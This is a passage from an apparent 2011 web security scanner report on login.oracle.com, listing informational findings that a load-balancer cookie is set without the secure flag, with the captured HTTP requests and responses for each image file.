gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:17 GMT Accept-Ranges: bytes Content-Length: 200 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCB_6uHK6EVADUS1EHWFB01t_cj X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ GIF89a.......................................................................................................!.......,..........E.D.di........ .,..........#.3!..R".$.......N..br29..[..@.4l.4@a...pw..;
7.17. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-l-t.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/gray-b-l-t.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:16 GMT Accept-Ranges: bytes Content-Length: 200 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBpq6uHK6EVADUS1EHWFB01t_cC X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ GIF89a.......................................................................................................!.......,..........E.$.AtHh..# ..C.t=..P.|=..DoH..v.^...>..^b..).U.$......8<....l......d..;
7.18. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-line.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/gray-b-line.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:17 GMT Accept-Ranges: bytes Content-Length: 45 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXC7v6uHK6EVADUS1EHWFB01t_cd X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ GIF89a.............!.......,..............P.;
7.19. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-r-b.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/gray-b-r-b.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:17 GMT Accept-Ranges: bytes Content-Length: 198 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXC9J6uHK6EVADUS1EHWFB01t_ch X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ GIF89a.......................................................................................................!.......,..........C`%.dINfj.j[.n ..L....5.8.(Gk(...PR...@...C..T....d].....N...y..x.!.;
7.20. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-r-t.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/gray-b-r-t.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:16 GMT Accept-Ranges: bytes Content-Length: 200 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBpu6uHK6EVADUS1EHWFB01t_cD X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ GIF89a.......................................................................................................!.......,..........E.$..xD...T..-......[.......G,.&D"!......"..5.U.$..r]./%.%s.YtU.e7.II..;
7.21. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-t-line.gif
Issue detail
